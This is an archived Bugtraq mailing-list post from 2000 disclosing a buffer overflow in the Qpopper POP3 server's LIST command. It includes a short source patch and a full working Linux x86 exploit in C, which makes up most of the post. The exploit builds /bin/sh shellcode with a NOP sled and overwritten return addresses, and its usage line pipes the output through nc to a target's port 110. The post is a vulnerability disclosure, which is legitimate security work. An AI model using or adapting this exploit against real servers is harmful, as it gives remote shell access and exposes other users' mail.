Bugtraq mailing list archives
Qpopper security bug
From: zhodiac () SOFTHOME NET (Zhodiac)
Date: Wed, 26 Jan 2000 14:55:11 +0100
!Hispahack Research Team http://hispahack.ccc.de Program: Qpopper <= 3.0beta29 (2.53 and olders are not vulnerable) Platform: *nix Risk: Remote access Author: Zhodiac <zhodiac () softhome net> Date: 20/1/2000 - Problem: =========== The, nowadays, so common qpop pop3 server is one of the best server which implements some features added not in normal pop3d. Like almost all software it has some security bugs. In this case, once you pass the login process you can execute malicious code due to a buffer overflow. With this buffer overflow (second argument of the LIST command) you can execute malicious code with the uid of the user you logged in, and with gid mail. Due to have gid mail, in some systems you can read all the mail of other users and even change/delete it. - Exploit: ========== For proof of vulnerability we release the Linux x86 xploit. But be aware, no public xploit for your system does not mean you can't be hacked. Vulnerability exists, fix it! ------- qpop-xploit.c ---------- /* * !Hispahack Research Team * http://hispahack.ccc.de * * By Zhodiac <zhodiac () softhome net> * * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53) * Overflow at pop_list()->pop_msg() * * Tested: 3.0beta28 offset=0 * 3.0beta26 offset=0 * 3.0beta25 offset=0 * * #include <standar/disclaimer.h> * * This code is dedicated to my love [CrAsH]] and to all the people who * were raided in Spain in the last few days. * * Madrid 10/1/2000 * */ #include <stdio.h> #define BUFFERSIZE 1004 #define NOP 0x90 #define OFFSET 0xbfffd9c4 char shellcode[]= "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89" "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89" "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh"; void usage(char *progname) { fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110",progname); exit(1); } int main(int argc, char **argv) { char *ptr,buffer[BUFFERSIZE]; unsigned long *long_ptr,offset=OFFSET; int aux; fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n"); fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac () softhome net>\n\n"); if (argc<3) usage(argv[0]); if (argc==4) offset+=atol(argv[3]); ptr=buffer; memset(ptr,0,sizeof(buffer)); memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16); ptr+=sizeof(buffer)-strlen(shellcode)-16; memcpy(ptr,shellcode,strlen(shellcode)); ptr+=strlen(shellcode); long_ptr=(unsigned long*)ptr; for(aux=0;aux<4;aux++) *(long_ptr++)=offset; ptr=(char *)long_ptr; *ptr='\0'; fprintf(stderr,"Buffer size: %d\n",strlen(buffer)); fprintf(stderr,"Offset: 0x%lx\n\n",offset); printf("USER %s\n",argv[1]); sleep(1); printf("PASS %s\n",argv[2]); sleep(1); printf("LIST 1 %s\n",buffer); sleep(1); printf("uname -a; id\n"); return(0); } ------- qpop-xploit.c --------- - Fix: ====== Best solution is to wait for a new patched version, meanwhile here you have a patch that will stop this attack (be aware that this patch was not done after a total revision of the code, maybe there are some other overflows). ------ pop_list.patch --------- 77c77 < return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %s", ---
return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %.128s",
------ pop_list.patch --------- piscis:~# patch pop_list.c pop_list.patch piscis:~# Spain r0x Greets :) Zhodiac
Current thread:
- Re: S/Key & OPIE Database Vulnerability, (continued)
- Re: S/Key & OPIE Database Vulnerability Brandon Palmer (Jan 27)
- Re: S/Key & OPIE Database Vulnerability Eivind Eklund (Jan 28)
- Multicast from hell John Watkins (Jan 27)
- Cobalt RaQ2 - a user of mine changed my admin password.. Chuck Pitre - Technical Support (Jan 27)
- Re: Cobalt RaQ2 - and QUBE2 Nir Simionovich (Rin Solo) (Jan 29)
- Tempfile vulnerabilities foo (Jan 30)
- [FreeBSD Security Advisory: FreeBSD-SA-00:02.procfs] Patrick Oonk (Jan 28)
- Re: Multicast from hell Omachonu Ogali (Jan 28)
- FTPPro has weird features - Fwd: Important matter for your abuse department Cedric Amand (Jan 28)
- New SCO patches... Aaron Sigel (Jan 27)
- Qpopper security bug Zhodiac (Jan 26)
- Re: S/Key & OPIE Database Vulnerability Dug Song (Jan 26)
- Microsoft Security Bulletin (MS00-006) Microsoft Product Security (Jan 26)
- Alert: MS IIS 4 / IS 2 (Cerberus Security Advisory CISADV000126) Mnemonix (Jan 26)
- Re: Alert: MS IIS 4 / IS 2 (Cerberus Security Advisory CISADV000126) Fredrik Widlund (Jan 30)
- Re: explanation and code for stream.c issues Nathan Ollerenshaw (Jan 21)